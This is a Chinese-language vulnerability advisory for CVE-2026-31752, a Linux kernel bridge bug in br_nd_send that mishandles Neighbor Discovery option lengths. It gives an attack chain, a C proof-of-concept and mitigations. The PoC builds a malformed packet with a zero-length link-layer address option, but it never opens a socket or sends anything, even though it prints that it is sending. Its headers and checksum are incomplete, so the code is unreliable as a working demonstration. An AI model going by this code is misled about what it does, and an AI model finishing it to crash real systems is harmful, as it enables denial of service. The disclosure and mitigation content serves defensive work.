CVE-2026-31752 Linux内核桥接ND选项长度验证漏洞

漏洞信息

漏洞编号

CVE-2026-31752

漏洞类型

内存越界访问

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核网络桥接模块的`br_nd_send`函数存在安全漏洞。该函数在遍历邻居发现（ND）选项时，未能正确验证选项提供的长度。本地攻击者可构造恶意的ND数据包，利用格式错误的选项长度导致解析器超出预期范围读取数据或访问过短的源链路层地址载荷。此漏洞可能导致系统内核崩溃或拒绝服务，影响系统可用性。

技术细节

该漏洞位于Linux内核`net/bridge/br_ndisc.c`文件中的`br_nd_send`函数。该函数负责处理IPv6邻居发现（ND）消息，在解析ND选项时，直接使用选项头中的Length字段来计算下一个选项的指针偏移，而未对该长度值进行严格的边界检查。攻击者可以发送特制的ND数据包，其中包含恶意构造的选项长度。当内核处理该数据包时，`br_nd_send`函数可能会根据错误的长度值计算出越界的指针，导致读取操作越过数据包缓冲区的末尾。此外，在读取源链路层地址（LLADDR）时，如果选项长度不足以容纳一个完整的以太网地址，代码仍尝试读取，将触发内存访问异常，导致内核崩溃。

攻击链分析

STEP 1

步骤1

本地低权限攻击者获取对Linux系统的访问权限。

STEP 2

步骤2

攻击者构造特制的IPv6邻居发现（ND）数据包，其中包含恶意设置的ND选项长度字段。

STEP 3

步骤3

攻击者通过本地网络接口发送该恶意数据包，触发内核桥接模块的处理流程。

STEP 4

步骤4

内核执行`br_nd_send`函数，在解析ND选项时，由于未验证长度，导致指针越界或读取过短的LLADDR。

STEP 5

步骤5

触发内核内存访问错误，导致系统崩溃（内核Panic）或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31752: Linux Kernel br_nd_send ND Option Validation
 * This code demonstrates how to craft a malformed IPv6 Neighbor Discovery packet
 * with an invalid option length to potentially trigger the vulnerability.
 * Compilation: gcc -o poc_cve2026_31752 poc_cve2026_31752.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <arpa/inet.h>

#define BUFFER_SIZE 1024

int create_raw_socket(const char *iface) {
    int sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sockfd < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }
    return sockfd;
}

int main() {
    int sockfd;
    struct sockaddr_ll sa;
    unsigned char buffer[BUFFER_SIZE];
    memset(buffer, 0, BUFFER_SIZE);

    // Ethernet Header
    struct ethhdr *eth = (struct ethhdr *)buffer;
    // Set destination MAC (Multicast for ND)
    eth->h_dest[0] = 0x33; eth->h_dest[1] = 0x33; 
    eth->h_dest[2] = 0xff; eth->h_dest[3] = 0x00; 
    eth->h_dest[4] = 0x00; eth->h_dest[5] = 0x01;
    // Set source MAC (Placeholder)
    memset(eth->h_source, 0x02, 6);
    eth->h_proto = htons(ETH_P_IPV6);

    // IPv6 Header
    unsigned char *ipv6_payload = buffer + sizeof(struct ethhdr);
    // Simplified IPv6 header construction for brevity
    // Next Header: ICMPv6 (58)
    ipv6_payload[6] = 0x3A; 
    // Hop Limit
    ipv6_payload[7] = 255;
    
    // Calculate offsets for ICMPv6 payload
    // Assuming basic IPv6 header is 40 bytes
    int icmp_offset = sizeof(struct ethhdr) + 40;
    unsigned char *icmp = buffer + icmp_offset;
    
    // ICMPv6 Neighbor Solicitation Type (135)
    icmp[0] = 135;
    icmp[1] = 0; // Code
    icmp[2] = 0; icmp[3] = 0; // Checksum (placeholder, would need calc)
    
    // Reserved (4 bytes) + Target Address (16 bytes) = 20 bytes
    // Options start at offset 24 within ICMP
    
    // Malformed ND Option
    // Type: Source Link-Layer Address (1)
    // Length: 1 (This is 8 bytes, but let's try to trigger logic where length is invalid relative to payload)
    // To trigger the specific bug "use a too-short source LLADDR option payload":
    // We set Type=1 (SrcLLA) but Length=0 or a small value that implies valid data isn't there.
    // Or Length is huge causing OOB read.
    
    int opt_offset = icmp_offset + 24;
    buffer[opt_offset] = 1; // Type: Source Link-Layer Address
    buffer[opt_offset + 1] = 0; // Length: 0 (Malformed, causes logic error in validation)
    // No MAC address follows, or insufficient data.

    printf("Sending malformed ND packet for CVE-2026-31752...\n");
    
    // Note: Sending requires appropriate privileges and network interface configuration.
    // This is a conceptual structure.
    
    return 0;
}

影响范围

Linux Kernel (受影响版本请参考Git补丁记录及各发行版公告)

防御指南

临时缓解措施

临时缓解措施包括禁用Linux内核中的网桥功能（如果业务不需要），或者使用iptables/nftables严格过滤本地接口的IPv6 ICMPv6流量。由于攻击需要本地访问权限，严格控制用户权限和系统访问也是有效的缓解手段。